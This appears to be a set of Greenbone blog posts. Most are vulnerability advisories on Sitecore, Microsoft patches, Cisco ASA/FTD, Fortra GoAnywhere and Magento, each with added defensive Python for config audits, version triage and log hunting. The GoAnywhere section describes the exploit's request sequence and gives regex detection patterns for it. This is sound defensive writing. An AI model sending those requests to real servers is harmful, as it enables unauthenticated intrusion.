Attackers are leveraging CVE-2025-53690 to deploy a novel reconnaissance malware dubbed “WEEPSTEEL”. The malware performs host and network discovery [TA0043], exfiltrates sensitive configuration files [TA0010], and escalates privileges [TA0004] by creating local Administrator accounts.

Techniques observed in the attacks include:

The OPENVAS ENTERPRISE FEED includes a remote banner version check for detecting affected Sitecore products. Sitecore’s official advisory strongly urges users to rotate machine keys, enable ViewState MAC, review IoCs, and audit for signs of compromise.
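
Two of the advisory's hardening steps, enabling ViewState MAC and rotating machine keys, are visible in the application's ASP.NET web.config. The following added example (not Sitecore's or Greenbone's code) parses a weak and a hardened web.config, both constructed inline, and reports the findings a configuration audit would raise. The KNOWN_SAMPLE_KEYS set is a placeholder for whatever published or sample key values an organization has catalogued; no real key material appears here.

```python
"""Audit ViewState MAC and machineKey settings in an ASP.NET web.config (added example)."""
import xml.etree.ElementTree as ET

# Constructed: MAC disabled and keys copied from a sample document.
WEAK_CONFIG = """<?xml version="1.0"?>
<configuration>
  <system.web>
    <pages enableViewStateMac="false" />
    <machineKey validationKey="SAMPLE-VALIDATION-KEY-DO-NOT-USE"
                decryptionKey="SAMPLE-DECRYPTION-KEY-DO-NOT-USE"
                validation="SHA1" decryption="AES" />
  </system.web>
</configuration>
"""

# Constructed: MAC enforced and unique (placeholder) keys set explicitly.
HARDENED_CONFIG = """<?xml version="1.0"?>
<configuration>
  <system.web>
    <pages enableViewStateMac="true" />
    <machineKey validationKey="PLACEHOLDER-UNIQUE-VALIDATION-KEY"
                decryptionKey="PLACEHOLDER-UNIQUE-DECRYPTION-KEY"
                validation="HMACSHA256" decryption="AES" />
  </system.web>
</configuration>
"""

# Placeholder catalogue of key values known to be published in sample material.
KNOWN_SAMPLE_KEYS = {"SAMPLE-VALIDATION-KEY-DO-NOT-USE", "SAMPLE-DECRYPTION-KEY-DO-NOT-USE"}


def _child(elem, tag):
    """Direct child with the given tag; avoids XPath because 'system.web' contains a dot."""
    for child in elem:
        if child.tag == tag:
            return child
    return None


def audit_viewstate(config_xml):
    """Return a list of finding identifiers; an empty list means both controls look right."""
    findings = []
    root = ET.fromstring(config_xml)
    system_web = _child(root, "system.web")
    if system_web is None:
        return ["system.web-section-missing"]

    # Control 1: ViewState MAC must not be switched off (the attribute defaults to true).
    pages = _child(system_web, "pages")
    if pages is not None and pages.get("enableViewStateMac", "true").lower() == "false":
        findings.append("viewstate-mac-disabled")

    # Control 2: machine keys must be set explicitly and must not be sample values.
    machine_key = _child(system_web, "machineKey")
    if machine_key is None:
        findings.append("machinekey-not-set")
    else:
        for attr in ("validationKey", "decryptionKey"):
            if machine_key.get(attr, "") in KNOWN_SAMPLE_KEYS:
                findings.append(attr + "-is-sample-value")
    return findings


if __name__ == "__main__":
    print("weak:", audit_viewstate(WEAK_CONFIG))
    print("hardened:", audit_viewstate(HARDENED_CONFIG))
```

A deserialization gadget in __VIEWSTATE only works when the server accepts ViewState it did not sign, so the MAC check is the first thing to verify; the key comparison catches the case the advisory is most concerned with, keys that are valid but known to others.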

“Exploitation More Likely” for Nine CVEs in Microsoft’s September Patch Cycle

Microsoft’s September patch cycle addresses 97 flaws; 9 rated critical, with the majority rated Important. Affected products include the Windows OS, SMB, NTFS, and NTLM, Microsoft Office, Azure, SQL Server, Hyper-V, DirectX, and more. Microsoft flagged nine vulnerabilities with an “Exploitation More Likely” status:

  • CVE-2025-55234 (CVSS 9.8): Improper authentication [CWE-287] in Windows’ SMB services could allow attackers to replay stolen credentials to gain privileged access under certain conditions. Customers who have not enabled SMB hardening measures are advised to assess their environment and apply either SMB Server signing or SMB Server Extended Protection for Authentication (EPA).
  • CVE-2025-55319 (CVSS 9.8): A command injection flaw [CWE-77] in Agentic AI integrations for Visual Studio Code (version 1.0.0 before 1.104.0) allows RCE for an unauthorized attacker. Users should update to the most recent version of Visual Studio Code [1].
  • CVE-2025-54110 (CVSS 8.8): A vulnerability in the Windows kernel involving an integer overflow / wraparound [CWE-190] can allow a local attacker to escape AppContainer Isolation. This can allow privilege escalation to the SYSTEM level and execution of arbitrary code [2].
  • CVE-2025-54918 (CVSS 8.8): An authentication flaw [CWE-287] in NTLM allows an authenticated attacker to remotely escalate privileges to the SYSTEM level, enabling full control of a Windows host [3].
  • CVE-2025-54916 (CVSS 7.8): A buffer handling bug [CWE-120] in the NTFS file system driver can be triggered by specially crafted input, leading to arbitrary code execution for an authenticated local attacker [4].
  • CVE-2025-54098 (CVSS 7.8): Hyper-V virtualization implements improper access control [CWE-284] that permits a malicious guest VM to escape to the host or gain elevated privileges within the hypervisor [5].
  • CVE-2025-54093 (CVSS 7.0): A TOCTOU race condition [CWE-367] in Windows TCP/IP could allow local attackers to gain elevated privileges via precise timing attacks [6].
  • CVE-2025-53803 (CVSS 5.5): A vulnerability in the Windows kernel results in error messages that leak sensitive information [CWE-209] to a local authenticated attacker, including sensitive memory addresses within kernel space [7].
  • CVE-2025-53804 (CVSS 5.5): An information-disclosure vulnerability [CWE-200] in the Windows kernel subsystem enables a local user to determine sensitive memory addresses within kernel space [8].

Organizations that do not attest patch levels across their IT infrastructure are at increased risk of harboring security gaps that attackers may exploit. Greenbone’s OPENVAS ENTERPRISE FEED frequently updates detection for the latest Microsoft vulnerabilities.

Summary

September 2025 underscored escalating cyber risks for many popular enterprise software platforms. Critical flaws in Fortra GoAnywhere MFT, Cisco ASA/FTD, and Sitecore were among thousands of new CVEs shaping the month’s threat landscape. Active cyber attack campaigns highlight the urgency of proactive vulnerability management. Regular scanning with Greenbone’s OPENVAS ENTERPRISE FEED enables defenders to detect and mitigate emerging risks before attackers exploit them. A free trial of Greenbone’s OPENVAS BASIC allows defenders to stay on top of emerging threats.

On September 25, 2025, three new CVEs affecting Cisco networking products exploded onto the global cyber security landscape. Two of these were actively exploited as zero-days prior to their disclosure. Greenbone now includes detection tests for all three new high-risk CVEs in the OPENVAS ENTERPRISE FEED.

CVE-2025-20333 (CVSS 9.9) and CVE-2025-20362 (CVSS 6.5) affect the VPN web server of the Cisco Secure Firewall Adaptive Security Appliance (ASA) and Firewall Threat Defense (FTD) platforms. The VPN web server enables remote devices to access an internal network via SSL/TLS-based VPN. These two CVEs can be chained for full system takeover of unpatched devices. Furthermore, they are reportedly leveraged in ArcaneDoor espionage campaigns. Also, CVE-2025-20363 (CVSS 9.0), while not tagged as actively exploited, has been bundled into most national security advisories addressing the first two flaws. The latter affects an extended list of products: Cisco ASA and FTD, as well as Cisco IOS, IOS XE, and IOS XR under certain configurations.

Greenbone’s OPENVAS ENTERPRISE FEED includes detection checks for each new high-risk CVE [1][2][3][4][5][6][7][8][9]. You can start a free trial to scan your IT environment for these and other cybersecurity vulnerabilities. Below, we discuss aspects of this ongoing situation, including the attack campaign, a brief technical description of the three flaws, and mitigation guidance.

Campaigns Exploiting Cisco ASA 5500-X Devices

CVE-2025-20333 and CVE-2025-20362 were actively exploited as zero-days targeting Cisco ASA 5500-X series devices without Secure Boot. Chained, they give unauthenticated attackers full control of the breached device. Known campaigns leveraging these flaws have deployed RayInitiator and LINE VIPER to achieve persistence [TA0003], execute commands remotely [TA0011], and exfiltrate data [TA0010]. These attacks are attributed to the ArcaneDoor cyber-espionage campaign, which has targeted perimeter network devices since early 2024, and are considered highly sophisticated. Advanced techniques used in the attacks include:

  • Low-level ROMMON (ROM Monitor) tampering [004] and Pre-OS bootkit [T1542.003] for covert persistence between reboots
  • Command-line interface (CLI) interception [008]
  • Disabling system logging [001]
  • Network packet capture [T1040]
  • Bypassing AAA network-device authentication and authorization protocols [004]

No public PoC exploits are available, but CISA and Cisco have confirmed that CVE-2025-20333 and CVE-2025-20362 are already exploited in-the-wild [1][2]. While attacks leveraging CVE-2025-20363 have not been confirmed, the CVE is included in many national CERT advisories covering the first two CVEs [3][4][5][6][7][8][9][10]. Supplemental guidance includes malware analysis from the UK’s NCSC [11] and IoC hunt instructions from CISA [12].

Technical Analysis of New Critical-Risk Cisco CVEs

All three CVEs are caused by improper validation of user-supplied input in HTTPS requests [CWE-20]. When combined, CVE-2025-20333 and CVE-2025-20362 allow attackers to execute arbitrary code as root on the victim’s system. CVE-2025-20333 is the culprit for allowing RCE, but requires valid VPN credentials. CVE-2025-20362 provides authentication bypass. CVE-2025-20363 also allows unauthenticated access to restricted URLs, but across a wider scope of products including: Cisco ASA and FTD software, as well as Cisco IOS, IOS XE, and IOS XR, under certain configurations.

Here is a brief description of each vulnerability:

  • CVE-2025-20333 (CVSS 9.9): Crafted HTTPS requests to the VPN web server of Cisco ASA and FTD devices can lead to arbitrary code execution as root. The flaw is a heap-based buffer overflow [CWE-122] and requires valid VPN user credentials for exploitation.
  • CVE-2025-20362 (CVSS 6.5): Unauthenticated attackers achieve authentication bypass to reach restricted URL endpoints on the VPN web server for Cisco ASA and FTD devices. The flaw is due to missing authorization [CWE-862] for sensitive HTTP paths.
  • CVE-2025-20363 (CVSS 9.0): Unauthenticated RCE as root on the VPN web server of Cisco ASA and FTD devices. Low-privilege authenticated attackers may achieve RCE as root on Cisco IOS, Cisco IOS XE, and Cisco IOS XR software. The flaw is a heap-based buffer overflow [CWE-122] caused by improper validation of user-supplied input in HTTP requests.

Mitigation Instructions for Impacted Devices

CISA has issued an Emergency Directive requiring all federal agencies to remediate the ongoing threat immediately. Users of these products should identify affected devices, analyze them for signs of compromise, and mitigate without delay to protect their operations. For analysis, users should follow CISA’s Core Dump and Hunt Instructions and Cisco’s official Detection Guide.

If a breach is identified, compromised devices should be disconnected from the network but not powered off, so that volatile evidence survives for the core dump, and Incident Response Plans (IRP) and eviction processes should be activated. Victims should notify the relevant regional authorities and submit their core dump(s) for analysis. Malware analysis for RayInitiator and LINE VIPER has been published by the UK’s NCSC [1]. Cisco’s official advisories can be consulted for more detailed information [2][3][4]. Platforms vulnerable to CVE-2025-20333 and CVE-2025-20362 include:

ASA hardware, ASA Services Module (ASA-SM), ASA Virtual (ASAv), and ASA firmware on Firepower 2100/4100/9300. Affected Cisco ASA software versions (release train – versions below the fixed release) are:

  • 9.12 – < 9.12.4.72
  • 9.14 – < 9.14.4.28
  • 9.16 – < 9.16.4.85
  • 9.17 – < 9.17.1.45
  • 9.18 – < 9.18.4.67
  • 9.19 – < 9.19.1.42
  • 9.20 – < 9.20.4.10
  • 9.22 – < 9.22.2.14
  • 9.23 – < 9.23.1.19

Cisco FTD appliances with software versions:

  • 7.0 – < 7.0.8.1
  • 7.1 – all versions
  • 7.2 – < 7.2.10.2
  • 7.3 – all versions
  • 7.4 – < 7.4.2.4
  • 7.6 – < 7.6.2.1
  • 7.7 – < 7.7.10.1

CVE-2025-20363 affects the aforementioned ASA and FTD products, all releases of Cisco IOS and Cisco IOS XE with Remote Access SSL VPN enabled, and Cisco IOS XR Software versions 6.8 and 6.9 (32-bit, on the ASR 9001) with the HTTP server enabled. Cisco NX-OS Software, 64-bit IOS XR, IOS/IOS XE without SSL VPN enabled, and ASA/FTD without WebVPN/SSL VPN features configured are not affected.
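To turn the version lists above into a quick triage check, here is an added Python example; it is not Cisco’s or Greenbone’s code. It transcribes the fixed releases listed above into a per-train table and reports whether a given ASA or FTD version is below its train’s fixed release. Trains with no fixed release are always reported as vulnerable, and trains not in the lists above are reported as unknown so a human reviews them. The accepted input formats, dotted 9.16.4.80 and the ASA show-version style 9.16(4)80, are assumptions. The check is version-only: as noted above, devices without WebVPN/SSL VPN configured are not exposed, so pair it with a review of which devices actually have the VPN web server enabled.

```python
"""Version triage for CVE-2025-20333 / CVE-2025-20362 on Cisco ASA and FTD.

Added example, not Cisco's or Greenbone's code. The fixed-release table is
transcribed from the affected-version lists in the article; the accepted
input formats ("9.16.4.80" and the ASA show-version style "9.16(4)80") are
assumptions. A version match alone does not prove exposure: the VPN web
server must also be enabled on the device.
"""
import re

# Fixed release per release train. None means the train has no fixed
# release at all, so every version in it is vulnerable.
ASA_FIXED = {
    (9, 12): (9, 12, 4, 72),
    (9, 14): (9, 14, 4, 28),
    (9, 16): (9, 16, 4, 85),
    (9, 17): (9, 17, 1, 45),
    (9, 18): (9, 18, 4, 67),
    (9, 19): (9, 19, 1, 42),
    (9, 20): (9, 20, 4, 10),
    (9, 22): (9, 22, 2, 14),
    (9, 23): (9, 23, 1, 19),
}
FTD_FIXED = {
    (7, 0): (7, 0, 8, 1),
    (7, 1): None,
    (7, 2): (7, 2, 10, 2),
    (7, 3): None,
    (7, 4): (7, 4, 2, 4),
    (7, 6): (7, 6, 2, 1),
    (7, 7): (7, 7, 10, 1),
}
TABLES = {"asa": ASA_FIXED, "ftd": FTD_FIXED}


def parse_version(text):
    """Normalise '9.16.4.80' or '9.16(4)80' to a 4-tuple of ints.

    Any non-digit run is treated as a separator, so the dotted and the
    parenthesised forms parse identically. Missing trailing fields are
    zero-filled so that '9.16(4)' compares below '9.16(4)1'.
    """
    fields = [int(n) for n in re.findall(r"\d+", text)]
    if len(fields) < 2:
        raise ValueError("not a recognisable ASA/FTD version: %r" % text)
    return tuple((fields + [0, 0, 0, 0])[:4])


def is_vulnerable(product, version):
    """Return True (below fixed release), False (fixed), or None (unknown train)."""
    table = TABLES[product.lower()]
    v = parse_version(version)
    train = v[:2]
    if train not in table:
        return None          # not in the published lists: review manually
    fixed = table[train]
    if fixed is None:
        return True          # no fixed release exists in this train
    return v < fixed


def triage(inventory):
    """inventory: iterable of (hostname, product, version) -> {hostname: state}."""
    return {host: is_vulnerable(product, version)
            for host, product, version in inventory}


if __name__ == "__main__":
    # Constructed inventory for the demo, not real devices.
    demo = [
        ("fw-edge-1", "asa", "9.16(4)80"),
        ("fw-edge-2", "asa", "9.16.4.85"),
        ("ftd-dc-1", "ftd", "7.1.0.3"),
        ("ftd-dc-2", "ftd", "7.7.10.1"),
        ("fw-legacy", "asa", "9.10.1.0"),
    ]
    labels = {True: "VULNERABLE", False: "fixed", None: "unknown train"}
    for host, state in triage(demo).items():
        print(f"{host:12} {labels[state]}")
```

Feed it the version strings from your asset inventory or from `show version` output; anything reported as unknown is a train outside the lists above and needs a manual look at Cisco’s advisory rather than being assumed safe.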

Summary

The coordinated disclosure of CVE-2025-20333, CVE-2025-20362, and CVE-2025-20363 has triggered a global security response. Combined, the CVEs have potential for full system compromise of Cisco ASA and FTD devices as well as devices using Cisco IOS, IOS XE, and IOS XR software with certain configurations. An ongoing ArcaneDoor espionage campaign has been identified leveraging CVE-2025-20333 and CVE-2025-20362 against legacy ASA 5500-X devices.

Security agencies, including CISA and national CERTs, have issued urgent mitigation guidance, stressing immediate patching, forensic investigation, and IRP activation. Greenbone has released detection checks for all three vulnerabilities in the OPENVAS ENTERPRISE FEED to help organizations rapidly identify and remediate exposure. Start a free trial today to scan your IT environment for these and other cybersecurity risks.

Cybersecurity has moved from boardroom buzzword to front-page reality in Italy this year. Walk into any conference room, attend any summit, or join any industry discussion, and you’ll hear the same urgent conversations: companies are under pressure from increasingly sophisticated cyber threats. However, there’s also something new happening – a wave of innovation and collaboration that’s finally matching the scale of the challenge.

From Abstract Risks to Real Solutions

The year started strong at ITASEC in February, where something refreshing emerged. Instead of the usual doom-and-gloom presentations about theoretical vulnerabilities, real solutions were finally taking center stage. Organizations shared practical strategies for balancing compliance requirements like NIS2 with the daily reality of cyberattacks.

The sessions on OPENVAS and enterprise solutions revealed a crucial shift: companies are moving beyond endless vulnerability spreadsheets toward actionable intelligence. The message was clear: staying informed isn’t enough anymore. Organizations need concrete guidance on their next steps.

But beneath the optimism, a sobering truth emerged from every conversation: Italy remains one of Europe’s most targeted countries. Participants weren’t shy about asking the hard questions: Why do our defenses still lag behind the threats? What will it actually take to turn the tide?

AI: The Double-Edged Sword

March brought CyberSec 2025 in Milan, where artificial intelligence dominated every discussion. The atmosphere was electric, equal parts excitement and apprehension. Everyone agreed that AI could revolutionize security operations, making them faster and smarter. But there was a catch: AI also creates entirely new attack surfaces.

The concerns were legitimate. AI models can be manipulated or stolen if not properly secured. That’s why approaches like keeping solutions fully on-premise and updating AI models only through controlled feeds have become so critical. It’s about getting the benefits of automation and intelligence without sacrificing security integrity.

As Dirk Boeing, Security Engineer at Greenbone, emphasized in the interview: “AI isn’t just a buzzword for us – it’s a practical tool that, when used responsibly, helps organizations fight back against cyber attacks.”

The New Reality of Vulnerability Management

The Security Summit later in March highlighted another fundamental shift: the end of occasional scanning as an acceptable security practice. Today’s threat landscape demands continuous, robust monitoring. We saw organizations learning to prioritize critical vulnerabilities, streamline remediation processes, and even transform regulatory compliance from a burden into a competitive advantage.

What stood out was the growing recognition that enterprise solutions offer something community editions simply can’t match: stable feeds, accurate detection, and secure on-premise deployment that goes far beyond basic functionality.

The Numbers Don’t Lie

These conference insights take on new urgency when having a look at what’s actually happening in Italy. The first half of 2025 alone brought 1,549 cyber incidents – a staggering 53% increase compared to 2024. Even more concerning: 346 of these were classified as serious, confirmed-impact events, representing a 98% year-over-year increase.

The attacks aren’t discriminating. Critical sectors like public administration, healthcare, and energy have all been hit hard. Take the attack on April 2 on Mobilità di Marca (MOM), Treviso’s public transport company, which knocked out electronic ticketing services for days. It’s a perfect example of how digital infrastructure vulnerabilities can disrupt everyday life.

Smaller companies aren’t escaping either. April reports showed the telecommunications sector getting hammered by spear-phishing attacks, with numerous organizations suffering significant breaches.

What’s Next: Proactive Defense Is the Only Defense

Every expert at every conference has been saying the same thing: continuous monitoring and proactive vulnerability management aren’t just “nice-to-haves” anymore. They’re survival requirements. The escalating frequency and sophistication of attacks demand a fundamental shift from reactive firefighting to proactive defense strategies.

Mark Your Calendar: October Events You Can’t Miss

The conversation continues this October, with three major events putting Rome at the center of Italy’s cybersecurity evolution:

AFCEA TechNet Europe Rome 2025 (October 1 – 2) brings together defense experts, industry leaders, and technology innovators to explore emerging threats and cutting-edge solutions.

Cybertech Europe (October 21 – 22) offers the chance to connect with top cybersecurity minds, see live demonstrations, and dive deep into the challenges and solutions shaping Italy’s digital resilience.

Richmond Cyber Resilience Forum (October 28 – 30) is a meeting point between demand and supply of innovative solutions. Here, Italian companies meet industry experts to discover trends and strategies of cybersecurity.

OPENVAS S.r.l. will be at all three events, showcasing enterprise-grade vulnerability management solutions, sharing insights on AI-driven security, and demonstrating how organizations can transform compliance from a checkbox exercise into a proactive defense strategy.

The Path Forward

2025 is proving to be a pivotal year for Italian cybersecurity. The threats are real and growing, but so is our collective response. Each conference, each collaboration, and each new innovation brings us closer to transforming today’s challenges into tomorrow’s resilience.

The question isn’t whether you’ll face a cyberattack, it’s whether you’ll be ready when it happens. Don’t wait for the wake-up call. The time to strengthen your cyber defenses is now.

Ready to turn insights into action? Connect with us at the upcoming October events, or reach out today to learn how enterprise-grade vulnerability management can transform your organization’s security position.

CVE-2025-10035 (CVSS 10.0) is a new critical severity vulnerability in Fortra GoAnywhere MFT (Managed File Transfer). This maximum-risk CVE could provide attackers with unauthenticated remote command execution (RCE). Greenbone can detect vulnerable systems and all users should patch with urgency. 


GoAnywhere MFT is a centralized Managed File Transfer (MFT) platform enabling file exchanges between business partners, customers, and within an organization. The application also provides auditing and compliance reporting.

The root cause of this CVE is a deserialization flaw [CWE-502] in Fortra GoAnywhere MFT’s License Servlet that allows attackers to forge a license response signature to inject and execute arbitrary commands [CWE-77]. Although in-the-wild exploitation has not been confirmed, Fortra GoAnywhere has been a hot target for ransomware attacks in the past: in 2023, CVE-2023-0669 (CVSS 7.2) was targeted by the Clop ransomware operators, resulting in multiple high-profile breaches. No public PoCs for CVE-2025-10035 are available yet, but a detailed technical analysis is. That analysis does not, however, include a complete exploit chain; some details of the chain remain unconfirmed.

CVE-2025-10035 has prompted national CERT alerts from Canada’s Canadian Centre for Cyber Security [1], the Netherlands’ NCSC-NL [2], and India’s CERT-In [3]. Also, Germany’s BSI assigned an alert [WID-SEC-2025-2090], and a CVSS Temporal score of 8.7, reflecting an unverified exploitation status (E:U), availability of official remediation (RL:O), and strong confidence in the report (RC:C).

A remote version check was swiftly added to Greenbone’s OPENVAS ENTERPRISE FEED, allowing defenders to identify vulnerable instances of Fortra GoAnywhere MFT.

Risk Assessment for CVE-2025-10035 in Fortra GoAnywhere

Going simply by the CVSS 10 rating, the risk posed by CVE-2025-10035 is extremely high if GoAnywhere’s Admin Console is exposed to the Internet. According to the analysis, attack complexity is considered low, no user interaction is required, and exploitation could result in complete system takeover.

However, public exposure is not a prerequisite for exploitation. Instances on a private network could also be exploited via so-called “malicious insider” threats or trusted third-parties [T1199]. Verizon’s 2025 DBIR (Data Breach Investigations Report) identifies Privilege Misuse (described as nefarious schemes from insider threats) as the primary root cause of 8% of breaches studied from 2024. This is a surprising figure, which erodes the belief that only public-facing vulnerabilities pose a primary threat to cyber resilience.

Technical Analysis of CVE-2025-10035 in Fortra GoAnywhere

GoAnywhere’s License Servlet is used for activating the GoAnywhere MFT license bundle as part of the setup, renewal, and migration processes. The License Servlet involves Java deserialization of the encoded “SignedObject”. In the case of CVE-2025-10035, this deserialization process could reportedly lead to RCE.

Analysis from Watchtowr shows a pre-authentication flaw that returns an auth token via the Unlicensed.xhtml page, even when an instance has already been licensed. A malformed HTTP GET request to a route such as /goanywhere/license/Unlicensed.xhtml/x? erroneously creates a valid license-request token and returns it, encrypted, within a bundled data object. This occurs because the error handler, AdminErrorHandlerServlet, internally generates a valid license-request token, associates it with the unauthenticated session, and returns it to the user within the aforementioned serialized data object. The bundle is encrypted with a hard-coded key, so it can be decrypted offline to reveal the GUID auth token in plaintext.

Once the GUID token is recovered, unauthenticated attackers can use it to reach the License Servlet endpoint, POST /goanywhere/lic/accept/<GUID> … bundle=<payload>, passing a malicious serialized payload. However, the mechanism by which such a payload gets deserialized is not yet known, because the payload must be signed with Fortra’s own private key. Security researchers have pointed to possible explanations such as a stolen private key or the existence of malicious payload(s) that were mistakenly signed with Fortra’s private key.

Mitigating CVE-2025-10035 in Fortra GoAnywhere

Fortra has released a security advisory [FI-2025-012] with mitigation instructions for CVE-2025-10035. Full mitigation requires upgrading to a fixed release: either to 7.8.4 (latest) or 7.6.3 (Sustain). Temporary mitigation can be achieved by restricting Admin Console access.

Fortra also advises all users to hunt for Indicators of Compromise (IoC), namely stack traces in the logs showing an error for SignedObject.getObject. The presence of this string strongly suggests the instance has been attacked. Following best practices, affected parties may also want to provide status updates to customers and other third-party stakeholders.
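The technical analysis above (the malformed Unlicensed.xhtml request and the POST to /goanywhere/lic/accept/<GUID>) together with Fortra’s SignedObject.getObject indicator give a small, concrete set of things to look for in logs. Here is an added Python example, not Fortra’s or Greenbone’s tooling, that runs those checks over sample log lines and also correlates the two web requests by client address, since a single client that first probes Unlicensed.xhtml and then posts to the License Servlet matches the chain described above. The application-log and access-log formats, the addresses and the GUID in the sample are all constructed for the example; java.security.SignedObject.getObject is the real JDK method, but the surrounding stack-trace lines are made up. Adapt the regular expressions to the real layout of your GoAnywhere application and reverse-proxy logs.

```python
"""Indicator hunt for CVE-2025-10035 (Fortra GoAnywhere MFT).

Added example, not Fortra's or Greenbone's tooling. It flags:
  * the SignedObject.getObject error string Fortra names as an IoC,
  * GET requests to /goanywhere/license/Unlicensed.xhtml with an extra
    trailing path segment (the pre-auth token leak described above), and
  * POST requests to /goanywhere/lic/accept/<GUID> (the License Servlet).
Log formats and all sample lines below are constructed for the example.
"""
import re

STACKTRACE_IOC = "SignedObject.getObject"

# Combined-style access log, assumed: client - - [time] "METHOD /path HTTP/1.1" status size
UNLICENSED_RE = re.compile(r'"GET /goanywhere/license/Unlicensed\.xhtml/[^ "]+')
ACCEPT_RE = re.compile(r'"POST /goanywhere/lic/accept/([0-9a-fA-F-]{36})')
CLIENT_RE = re.compile(r"^(\S+) ")


def scan_app_log(lines):
    """Return (line_no, reason, line) for application-log lines carrying the IoC."""
    hits = []
    for no, line in enumerate(lines, 1):
        if STACKTRACE_IOC in line:
            hits.append((no, "SignedObject.getObject error (Fortra IoC)", line.rstrip()))
    return hits


def scan_access_log(lines):
    """Return (line_no, reason, line) for suspicious license-endpoint requests."""
    hits = []
    for no, line in enumerate(lines, 1):
        if UNLICENSED_RE.search(line):
            hits.append((no, "malformed Unlicensed.xhtml request (token-leak probe)", line.rstrip()))
        m = ACCEPT_RE.search(line)
        if m:
            hits.append((no, "License Servlet accept POST for GUID " + m.group(1), line.rstrip()))
    return hits


def suspicious_clients(access_lines):
    """Clients that both probed Unlicensed.xhtml and posted to /lic/accept."""
    probed, posted = set(), set()
    for line in access_lines:
        client = CLIENT_RE.match(line)
        if not client:
            continue
        if UNLICENSED_RE.search(line):
            probed.add(client.group(1))
        if ACCEPT_RE.search(line):
            posted.add(client.group(1))
    return sorted(probed & posted)


# Constructed sample data (not from a real incident).
APP_LOG = [
    "2025-09-20 10:02:14 INFO  License servlet request received",
    "2025-09-20 10:02:15 ERROR License servlet failed to process bundle",
    "java.lang.ClassCastException: unexpected object type in license bundle",
    "        at java.security.SignedObject.getObject(SignedObject.java)",
]
ACCESS_LOG = [
    '198.51.100.4 - - [20/Sep/2025:09:55:00 +0000] "GET /goanywhere/license/Unlicensed.xhtml HTTP/1.1" 200 3900',
    '203.0.113.7 - - [20/Sep/2025:10:02:10 +0000] "GET /goanywhere/license/Unlicensed.xhtml/x? HTTP/1.1" 200 4120',
    '203.0.113.7 - - [20/Sep/2025:10:02:14 +0000] "POST /goanywhere/lic/accept/3f2504e0-4f89-11d3-9a0c-0305e82c3301 HTTP/1.1" 500 0',
]

if __name__ == "__main__":
    for hit in scan_app_log(APP_LOG) + scan_access_log(ACCESS_LOG):
        print("line %d: %s\n    %s" % hit)
    print("clients completing the chain:", suspicious_clients(ACCESS_LOG))
```

The first sample access-log line is an ordinary request to Unlicensed.xhtml and is deliberately not flagged; only the request with the extra path segment and the subsequent POST to the License Servlet from the same client are reported. A hit on the stack-trace string alone is the indicator Fortra treats as evidence of exploitation, so escalate that one regardless of what the access log shows.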

Summary

CVE-2025-10035 is a CVSS 10, maximum severity deserialization flaw in GoAnywhere MFT which may allow unauthenticated RCE. In 2023 attackers leveraged another CVE in GoAnywhere MFT for widespread exploitation, and national CERTs have issued alerts, signifying high risk. The OPENVAS ENTERPRISE FEED includes a version check to detect vulnerable instances in an organization’s infrastructure. End users should identify public-facing and locally deployed instances and patch with urgency.

Dr. Jan-Oliver Wagner

After many years at the helm of Greenbone, our co-founder, Dr. Jan-Oliver Wagner, is stepping down from active operational management. However, he will remain closely associated with the company as a consultant. We would like to thank Dr. Wagner for his extraordinary commitment and all that he has achieved for Greenbone since its foundation.

Elmar Geese

The new CEO is Elmar Geese, who has been part of Greenbone’s management team since 2019. With this change in leadership, we are focusing on continuity and stability for our customers, employees and shareholders.

CVE-2025-54236 (CVSS 9.1) is an account-takeover flaw that may result in unauthenticated remote code execution (RCE) under certain conditions. Dubbed “SessionReaper”, CVE-2025-54236 affects Adobe Commerce, Adobe Commerce B2B, and Magento Open Source web applications. The root cause is Improper Input Validation [CWE-20] in the REST API. Adobe’s official advisory describes the issue as a security feature bypass although no further explanation is provided.


The exploit chain for CVE-2025-54236 starts with a nested deserialization vulnerability [CWE-502] and results in a malicious session for a customer account. Security researchers from Sansec claim that Remote Code Execution (RCE) is possible when file-based session storage is used and that other attack chains may also exist, such as RCE via Redis or database session storage. Blaklis is credited with the discovery and responsible disclosure of CVE-2025-54236 via the Hackerone platform.

A full technical description, PoC, or full exploit kits are not yet publicly available. However, France’s CERT-FR has issued a public advisory for the vulnerability. Greenbone’s OPENVAS ENTERPRISE FEED already includes a remote banner check to identify vulnerable systems and verify patch status.

Risk Assessment for CVE-2025-54236 (aka “SessionReaper”)

Magento Open Source (released in 2008) and its commercial counterpart Adobe Commerce are widely used e-commerce platforms. As of 2024, they power on the order of 200,000 to 250,000 live stores, putting Magento among the leading global e-commerce platforms. This wide usage makes it an attractive target for attackers.

Previous vulnerabilities in Magento have been leveraged in mass exploitation attacks within hours [1][2][3][4] of their disclosure. In this case, Adobe’s patch was accidentally leaked publicly, giving attackers a head start on developing exploit code. If exploited, attackers could install malware [T1105] in an attempt to covertly maintain persistent access [TA0003] to the victim’s infrastructure. This could lead to future attacks, such as stealing payment card information to make fraudulent transactions [T1657], stealing other sensitive information [TA0010], conducting phishing [T1566] attacks against customers of the website, or deploying ransomware against the victim [T1486].

Mitigating CVE-2025-54236 (aka “SessionReaper”)

CVE-2025-54236 affects Adobe Commerce, Adobe Commerce B2B, and Magento Open Source across multiple versions, as well as the Custom Attributes Serializable module on all platforms and deployment methods [1]. However, Adobe’s own knowledge base seems to provide contradictory information, stating that the Custom Attributes Serializable module versions 0.1.0 – 0.4.0 are affected, but also advises upgrading the module to version 0.4.0 or higher.

Users are advised to install the hotfix patch provided by Adobe or update to the latest version immediately to protect their online business operations and customers. Users should also conduct a thorough assessment to determine whether their instance has already been compromised and if found, remove the infection. Adobe has also released a developer guide to help users adjust to any necessary changes in the web application’s REST API. The OPENVAS ENTERPRISE FEED includes a remote banner check to identify vulnerable systems.

Summary

CVE-2025-54236 poses a critical risk to Magento and Adobe Commerce users. For attackers, the flaw enables account takeover and potentially unauthenticated RCE on a victim’s infrastructure. Defenders should identify vulnerable systems and patch them immediately. Greenbone’s OPENVAS ENTERPRISE FEED can help to identify vulnerable web applications and verify remediation status. IT security teams should also audit their systems to detect potential breaches and remove infections if any indicators of compromise (IoC) are found.